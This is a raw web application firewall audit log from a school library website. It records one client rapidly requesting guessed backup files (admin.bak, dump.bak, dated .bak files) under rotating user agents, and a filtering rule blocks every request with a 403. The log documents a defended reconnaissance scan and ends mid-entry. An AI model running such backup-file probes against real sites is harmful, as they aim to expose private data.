[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227985386 1695 (- - -) Stopwatch2: 1747683227985386 1695; combined=704, p1=350, p2=328, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --805c8f75-Z-- --61787027-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopIAAAABE 103.236.140.4 34924 103.236.140.4 8181 --61787027-B-- GET /forum.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152633521 --61787027-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --61787027-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227986046 1725 (- - -) Stopwatch2: 1747683227986046 1725; combined=705, p1=334, p2=345, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61787027-Z-- --77fa7101-A-- [20/May/2025:02:33:48 +0700] aCuHmzuVdcwZ_qZ5ZIopIgAAAAw 103.236.140.4 34924 103.236.140.4 8181 --77fa7101-B-- GET /home.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127995070 --77fa7101-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --77fa7101-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227998504 1654 (- - -) Stopwatch2: 1747683227998504 1654; combined=659, p1=324, p2=302, p3=0, p4=0, p5=32, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77fa7101-Z-- --92db3266-A-- [20/May/2025:02:33:48 +0700] aCuHnDuVdcwZ_qZ5ZIopJgAAAAA 103.236.140.4 34924 103.236.140.4 8181 --92db3266-B-- GET /aspx.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3; rv:64.0.2) Gecko/20100101 Firefox/64.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906349 --92db3266-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --92db3266-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228013946 1739 (- - -) Stopwatch2: 1747683228013946 1739; combined=689, p1=316, p2=345, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92db3266-Z-- --c3075007-A-- [20/May/2025:02:33:48 +0700] aCuHnL8BMImlI6dyVeOF6QAAAMU 103.236.140.4 35138 103.236.140.4 8181 --c3075007-B-- GET /test.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 OPR/53.0.2907.110 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161448019 --c3075007-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c3075007-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228029707 2205 (- - -) Stopwatch2: 1747683228029707 2205; combined=723, p1=326, p2=354, p3=0, p4=0, p5=42, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3075007-Z-- --377ff342-A-- [20/May/2025:02:33:48 +0700] aCuHnL8BMImlI6dyVeOF6wAAAM8 103.236.140.4 35138 103.236.140.4 8181 --377ff342-B-- GET /code.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:51.0.1) Gecko/20100101 Firefox/51.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906370 --377ff342-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --377ff342-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228035966 1935 (- - -) Stopwatch2: 1747683228035966 1935; combined=727, p1=358, p2=339, p3=0, p4=0, p5=29, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --377ff342-Z-- --f009c571-A-- [20/May/2025:02:33:48 +0700] aCuHnL8BMImlI6dyVeOF7AAAAMI 103.236.140.4 35138 103.236.140.4 8181 --f009c571-B-- GET /master.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906375 --f009c571-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f009c571-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228041909 2200 (- - -) Stopwatch2: 1747683228041909 2200; combined=923, p1=497, p2=393, p3=0, p4=0, p5=33, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f009c571-Z-- --b8d7b811-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oawAAAEw 103.236.140.4 35018 103.236.140.4 8181 --b8d7b811-B-- GET /2011.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757740 --b8d7b811-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b8d7b811-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228063707 2340 (- - -) Stopwatch2: 1747683228063707 2340; combined=842, p1=440, p2=374, p3=0, p4=0, p5=27, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8d7b811-Z-- --85d8027e-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9obQAAAEo 103.236.140.4 35018 103.236.140.4 8181 --85d8027e-B-- GET /erpustakaan_smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182639 --85d8027e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --85d8027e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228074764 2169 (- - -) Stopwatch2: 1747683228074764 2169; combined=818, p1=387, p2=402, p3=0, p4=0, p5=29, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85d8027e-Z-- --f537714d-A-- [20/May/2025:02:33:48 +0700] aCuHnL8BMImlI6dyVeOF7QAAANA 103.236.140.4 35138 103.236.140.4 8181 --f537714d-B-- GET /2022.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161448045 --f537714d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f537714d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228076548 1851 (- - -) Stopwatch2: 1747683228076548 1851; combined=685, p1=325, p2=332, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f537714d-Z-- --fd92c873-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ocAAAAFY 103.236.140.4 35018 103.236.140.4 8181 --fd92c873-B-- GET /2012.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872024 --fd92c873-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fd92c873-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228107375 1777 (- - -) Stopwatch2: 1747683228107375 1777; combined=665, p1=317, p2=321, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd92c873-Z-- --c7cf0731-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ocQAAAEY 103.236.140.4 35018 103.236.140.4 8181 --c7cf0731-B-- GET /2023.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872029 --c7cf0731-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c7cf0731-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228116117 2147 (- - -) Stopwatch2: 1747683228116117 2147; combined=705, p1=342, p2=337, p3=0, p4=0, p5=25, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7cf0731-Z-- --13c5c81f-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ocgAAAEU 103.236.140.4 35018 103.236.140.4 8181 --13c5c81f-B-- GET /html.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 OPR/53.0.2907.110 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700282 --13c5c81f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13c5c81f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228138766 1769 (- - -) Stopwatch2: 1747683228138766 1769; combined=705, p1=310, p2=357, p3=0, p4=0, p5=38, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c5c81f-Z-- --2f35cd62-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9odgAAAEQ 103.236.140.4 35018 103.236.140.4 8181 --2f35cd62-B-- GET /admin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2; rv:52.7.2) Gecko/20100101 Firefox/52.7.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700317 --2f35cd62-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2f35cd62-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228440009 2240 (- - -) Stopwatch2: 1747683228440009 2240; combined=788, p1=338, p2=423, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f35cd62-Z-- --5bca232e-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oeAAAAFc 103.236.140.4 35916 103.236.140.4 8181 --5bca232e-B-- GET /bbs.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:66.0.3) Gecko/20100101 Firefox/66.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872119 --5bca232e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5bca232e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228539066 2326 (- - -) Stopwatch2: 1747683228539066 2326; combined=847, p1=432, p2=386, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bca232e-Z-- --646ecc6d-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oewAAAFA 103.236.140.4 35922 103.236.140.4 8181 --646ecc6d-B-- GET /dump.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906407 --646ecc6d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --646ecc6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228558056 1838 (- - -) Stopwatch2: 1747683228558056 1838; combined=694, p1=334, p2=327, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --646ecc6d-Z-- --0b7fca5e-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ofQAAAFU 103.236.140.4 35922 103.236.140.4 8181 --0b7fca5e-B-- GET /2025.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700325 --0b7fca5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0b7fca5e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228598171 2608 (- - -) Stopwatch2: 1747683228598171 2608; combined=884, p1=392, p2=467, p3=0, p4=0, p5=25, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b7fca5e-Z-- --36633d0f-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ofwAAAEA 103.236.140.4 35922 103.236.140.4 8181 --36633d0f-B-- GET /js.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 